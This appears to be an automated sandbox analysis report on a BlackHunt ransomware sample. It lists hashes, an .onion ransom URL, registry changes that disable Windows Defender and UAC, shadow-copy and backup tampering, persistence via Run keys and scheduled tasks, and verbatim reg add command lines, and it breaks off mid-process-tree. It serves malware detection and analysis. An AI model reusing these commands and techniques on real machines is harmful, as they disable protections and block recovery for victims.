Analysis
-
max time kernel
185s -
max time network
201s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe
Resource
win10v2004-20231215-en
General
-
Target
e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe
-
Size
707KB
-
MD5
ad38a03bbc925b7885fab5ce04814f6f
-
SHA1
2e2d3c88f1c08e3f39544200adde299e1a910a67
-
SHA256
e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b
-
SHA512
afc0907165be0e2df2cdc0bc6e9eefe0b532eff8618c0b5af7c4ef7cc05ae199b37a4c50a0e32af3e217ffd04ecacc2b642c52b065a1f2a5f42ded905c8d0881
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Y8Mvnh:6uaTmkZJ+naie5OTamgEoKxLWzSh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3820 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2080 bcdedit.exe 1140 bcdedit.exe -
Renames multiple (295) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2332 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\O: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\E: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\U: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\G: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\L: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\W: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\K: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\M: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\T: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\I: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\H: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\J: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\V: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\S: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\Z: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\R: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\P: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\N: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\Y: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\X: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened (read-only) \??\B: e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ko.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Google\#BlackHunt_Private.key e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_Private.key e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\dotnet\shared\#BlackHunt_Private.key e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\AssertPing.pot e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\7z.sfx e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.cpl e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzmappings e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\asm.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\icu_web.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libffi.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11cryptotoken.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jsse.jar e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\mesa3d.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfont.properties.ja e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\sound.properties e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyDrop32x32.gif e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\localedata.jar e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_Private.key e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1992 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1724 vssadmin.exe 4372 vssadmin.exe 4160 vssadmin.exe 5080 vssadmin.exe 3360 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeRestorePrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeBackupPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeTakeOwnershipPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeAuditPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeSecurityPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeIncBasePriorityPrivilege 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Token: SeBackupPrivilege 2872 vssvc.exe Token: SeRestorePrivilege 2872 vssvc.exe Token: SeAuditPrivilege 2872 vssvc.exe Token: SeBackupPrivilege 2244 wbengine.exe Token: SeRestorePrivilege 2244 wbengine.exe Token: SeSecurityPrivilege 2244 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4488 wrote to memory of 1252 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 92 PID 4488 wrote to memory of 1252 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 92 PID 4488 wrote to memory of 3316 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 94 PID 4488 wrote to memory of 3316 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 94 PID 4488 wrote to memory of 696 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 96 PID 4488 wrote to memory of 696 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 96 PID 4488 wrote to memory of 3732 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 99 PID 4488 wrote to memory of 3732 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 99 PID 4488 wrote to memory of 1536 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 100 PID 4488 wrote to memory of 1536 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 100 PID 696 wrote to memory of 2068 696 cmd.exe 105 PID 696 wrote to memory of 2068 696 cmd.exe 105 PID 1536 wrote to memory of 3896 1536 cmd.exe 103 PID 1536 wrote to memory of 3896 1536 cmd.exe 103 PID 3732 wrote to memory of 2860 3732 cmd.exe 104 PID 3732 wrote to memory of 2860 3732 cmd.exe 104 PID 3316 wrote to memory of 3240 3316 cmd.exe 102 PID 3316 wrote to memory of 3240 3316 cmd.exe 102 PID 1252 wrote to memory of 2596 1252 cmd.exe 106 PID 1252 wrote to memory of 2596 1252 cmd.exe 106 PID 4488 wrote to memory of 1860 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 107 PID 4488 wrote to memory of 1860 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 107 PID 4488 wrote to memory of 3760 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 109 PID 4488 wrote to memory of 3760 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 109 PID 4488 wrote to memory of 3996 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 111 PID 4488 wrote to memory of 3996 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 111 PID 4488 wrote to memory of 4848 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 113 PID 4488 wrote to memory of 4848 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 113 PID 4488 wrote to memory of 3004 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 115 PID 4488 wrote to memory of 3004 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 115 PID 1860 wrote to memory of 2496 1860 cmd.exe 117 PID 1860 wrote to memory of 2496 1860 cmd.exe 117 PID 3760 wrote to memory of 4768 3760 cmd.exe 118 PID 3760 wrote to memory of 4768 3760 cmd.exe 118 PID 3996 wrote to memory of 1132 3996 cmd.exe 120 PID 3996 wrote to memory of 1132 3996 cmd.exe 120 PID 4488 wrote to memory of 1300 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 119 PID 4488 wrote to memory of 1300 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 119 PID 4488 wrote to memory of 4724 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 123 PID 4488 wrote to memory of 4724 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 123 PID 4488 wrote to memory of 1712 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 125 PID 4488 wrote to memory of 1712 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 125 PID 4848 wrote to memory of 1788 4848 cmd.exe 124 PID 4848 wrote to memory of 1788 4848 cmd.exe 124 PID 3004 wrote to memory of 4980 3004 cmd.exe 127 PID 3004 wrote to memory of 4980 3004 cmd.exe 127 PID 4488 wrote to memory of 3268 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 128 PID 4488 wrote to memory of 3268 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 128 PID 4488 wrote to memory of 4352 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 131 PID 4488 wrote to memory of 4352 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 131 PID 1300 wrote to memory of 2252 1300 cmd.exe 132 PID 1300 wrote to memory of 2252 1300 cmd.exe 132 PID 4488 wrote to memory of 2180 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 139 PID 4488 wrote to memory of 2180 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 139 PID 4488 wrote to memory of 4456 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 133 PID 4488 wrote to memory of 4456 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 133 PID 4488 wrote to memory of 956 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 138 PID 4488 wrote to memory of 956 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 138 PID 4488 wrote to memory of 1640 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 136 PID 4488 wrote to memory of 1640 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 136 PID 4488 wrote to memory of 1708 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 141 PID 4488 wrote to memory of 1708 4488 e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe 141 PID 4724 wrote to memory of 1120 4724 cmd.exe 142 PID 4724 wrote to memory of 1120 4724 cmd.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe"C:\Users\Admin\AppData\Local\Temp\e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4488 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
